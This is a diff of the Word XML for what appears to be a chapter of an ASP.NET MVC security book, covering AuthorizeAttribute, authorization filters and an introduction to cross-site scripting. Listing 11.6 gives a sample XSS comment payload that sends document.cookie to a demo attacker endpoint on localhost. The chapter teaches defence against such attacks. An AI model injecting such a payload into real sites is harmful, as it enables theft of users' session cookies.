-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>return</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> View();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeAnnotation"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#1 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Multiple</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> roles are comma delimited</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
-        <w:t>Developers</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> action will only be allowed to users in the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
-        <w:t>admins</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> or </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+        <w:t>ChildActionOnlyAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
-        <w:t>developers</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> roles - all other users (authenticated or not) will be issued a </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
-        <w:t>401</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> response code and using </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ASP.NET's</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> forms authentication, redirected to the login page. Now that we've seen a few examples of how the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>RequireHttpsAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> is used, let's talk about how it works.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Head2"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">11.1.3 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> - how it works</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> checks the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>ValidateAntiForgeryTokenAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
-        <w:t>IPrincipal</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> associated with the current </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
-        <w:t>HttpContext</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. When </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>Users</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> or </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>Roles</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is specified, it ensures the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>IPrincipal</w:t>
-      </w:r>
-      <w:r>
-        <w:t>'s</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> username is in the allowed usernames, or a member of one of the granted roles.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">If </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> is applied to a controller, it is applied to every action in that controller.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">If multiple </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthrorizeAttributes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> are applied to an action, all checks occur and the user must be authorized by all of them.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> implements a special interface called </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>IAuthorizationFilter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">.  When applied to an action, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>IAuthorizationFilter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> will execute before any other action filters, and of course before the normal result. </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Listing 11.4 shows the declaration of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>IAuthorizationFilter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeListingCaption"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Listing 11.4 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>IAuthorizationFilter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>public</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> interface </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>IAuthorizationFilter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>void</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>OnAuthorization</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>AuthorizationContext</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>filterContext</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>);</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">   #1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">If you wanted to create your own filter attribute for authentication or authorization, you could implement this interface as an action filter and apply it to an action. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> does its security check in the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>OnAuthorization</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> method (1)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, and sets the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizationContext</w:t>
-      </w:r>
-      <w:r>
-        <w:t>'s</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>Result</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> property to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>HttpUnauthorizedResult</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> - the mechanism for returning that </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>401</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> status</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> code</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">There are several other </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>IAuthenticationFilter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> implementations in ASP.NET MVC; all are used to short-circuit the normal response to protect against undesired requests.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-      </w:pPr>
-      <w:commentRangeStart w:id="5"/>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>ChildActionOnlyAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>RequireHttpsAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>ValidateAntiForgeryTokenAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
         <w:t>ValidateInputAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:commentRangeEnd w:id="5"/>
+    </w:p>
+    <w:commentRangeEnd w:id="6"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body1"/>
@@ -1280,19 +960,21 @@
           <w:rStyle w:val="CommentReference"/>
           <w:vanish/>
         </w:rPr>
-        <w:commentReference w:id="5"/>
+        <w:commentReference w:id="6"/>
+      </w:r>
+      <w:commentRangeEnd w:id="7"/>
+      <w:r>
+        <w:commentReference w:id="7"/>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">We've seen how </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> can help us manage authentication and authorization, now let's turn our attention to other</w:t>
       </w:r>
@@ -1303,7 +985,11 @@
         <w:t xml:space="preserve"> att</w:t>
       </w:r>
       <w:r>
-        <w:t>ack vectors. While authentication and authorization checks prevent hapless visitors from accessing secure areas, we still must protect our application from hackers and thieves who attempt to exploit vulnerabilities inherent in web applications.</w:t>
+        <w:t xml:space="preserve">ack vectors. While authentication and authorization checks prevent hapless visitors from accessing secure </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>areas, we still must protect our application from hackers and thieves who attempt to exploit vulnerabilities inherent in web applications.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1313,11 +999,18 @@
       <w:r>
         <w:t xml:space="preserve">11.2 </w:t>
       </w:r>
-      <w:commentRangeStart w:id="6"/>
-      <w:r>
-        <w:t xml:space="preserve">Cross Site </w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="6"/>
+      <w:commentRangeStart w:id="8"/>
+      <w:commentRangeStart w:id="9"/>
+      <w:r>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ross-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Site </w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="8"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
@@ -1327,7 +1020,18 @@
           <w:vanish/>
           <w:color w:val="000000"/>
         </w:rPr>
-        <w:commentReference w:id="6"/>
+        <w:commentReference w:id="8"/>
+      </w:r>
+      <w:commentRangeEnd w:id="9"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:b w:val="0"/>
+          <w:i w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:commentReference w:id="9"/>
       </w:r>
       <w:r>
         <w:t>Scripting (XSS)</w:t>
@@ -1337,16 +1041,11 @@
       <w:pPr>
         <w:pStyle w:val="Body1"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">Cross </w:t>
-      </w:r>
-      <w:r>
-        <w:t>site</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> scripting </w:t>
+      <w:r>
+        <w:t>Cross-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">site scripting </w:t>
       </w:r>
       <w:r>
         <w:t>is a technique where a malicious user manipulates the system so that special JavaScript appears on the vuln</w:t>
@@ -1354,20 +1053,31 @@
       <w:r>
         <w:t xml:space="preserve">erable </w:t>
       </w:r>
-      <w:commentRangeStart w:id="7"/>
-      <w:r>
-        <w:t>website - script</w:t>
+      <w:commentRangeStart w:id="10"/>
+      <w:commentRangeStart w:id="11"/>
+      <w:r>
+        <w:t>w</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ebsite -- </w:t>
+      </w:r>
+      <w:r>
+        <w:t>script</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:commentRangeEnd w:id="7"/>
+      <w:commentRangeEnd w:id="10"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
           <w:vanish/>
         </w:rPr>
-        <w:commentReference w:id="7"/>
+        <w:commentReference w:id="10"/>
+      </w:r>
+      <w:commentRangeEnd w:id="11"/>
+      <w:r>
+        <w:commentReference w:id="11"/>
       </w:r>
       <w:r>
         <w:t>that</w:t>
@@ -1449,15 +1159,7 @@
         <w:t xml:space="preserve"> applications.  One is vulne</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">rable to </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>cross site</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> scripting. </w:t>
+        <w:t xml:space="preserve">rable to cross site scripting. </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">It features a simple comment submission page. </w:t>
@@ -1502,31 +1204,28 @@
       <w:r>
         <w:t>When the example Visual Studio solution is run (</w:t>
       </w:r>
-      <w:commentRangeStart w:id="8"/>
+      <w:commentRangeStart w:id="12"/>
+      <w:commentRangeStart w:id="13"/>
       <w:r>
         <w:t xml:space="preserve">typically with CTRL-F5), </w:t>
       </w:r>
-      <w:commentRangeEnd w:id="8"/>
+      <w:commentRangeEnd w:id="12"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
           <w:vanish/>
         </w:rPr>
-        <w:commentReference w:id="8"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">two sites appear in the web browser.  The vulnerable site sets a cookie, ostensibly containing sensitive data. The second site is the </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>attacker</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> it will collect the data from our evil request</w:t>
+        <w:commentReference w:id="12"/>
+      </w:r>
+      <w:commentRangeEnd w:id="13"/>
+      <w:r>
+        <w:commentReference w:id="13"/>
+      </w:r>
+      <w:r>
+        <w:t>two sites appear in the web browser.  The vulnerable site sets a cookie, ostensibly containing sensitive data. The second site is the attacker</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, it will collect the data from our evil request</w:t>
       </w:r>
       <w:r>
         <w:t>.  The attacking site has a page that should read "</w:t>
@@ -1576,21 +1275,8 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>public</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ActionResult</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Index()</w:t>
+      <w:r>
+        <w:t>public ActionResult Index()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1608,68 +1294,30 @@
       <w:r>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> cookie = new </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>HttpCookie</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>("</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mvcinaction</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>", "secret");</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Response.SetCookie</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>cookie);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>return</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> View();</w:t>
+      <w:r>
+        <w:t>var cookie = new HttpCookie("mvcinaction", "secret");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>Response.SetCookie(cookie);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>return View();</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1699,6 +1347,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4800600" cy="3792220"/>
@@ -1741,15 +1390,7 @@
         <w:pStyle w:val="FigureCaption"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Figure 11.1 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>The</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> comments page</w:t>
+        <w:t>Figure 11.1 The comments page</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1768,91 +1409,38 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Listing 11.6 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>A</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> malicious comment</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>A long comment &lt;script&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>document.write</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>'&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>img</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Listing 11.6 A malicious comment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">A long comment &lt;script&gt;document.write('&lt;img src=http://localhost:8082/attack/register?input=' </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  #1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>+escape(document.cookie)+ '/&gt;')&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>This comment includes a script block.  The script block writes HTML to the browser.  The HTML contains an image whose SRC attribute</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>src</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">=http://localhost:8082/attack/register?input=' </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  #1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>+</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>escape</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>document.cookie</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)+ '/&gt;')&lt;/script&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>This comment includes a script block.  The script block writes HTML to the browser.  The HTML contains an image whose SRC attribute</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Bold"/>
@@ -1882,6 +1470,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
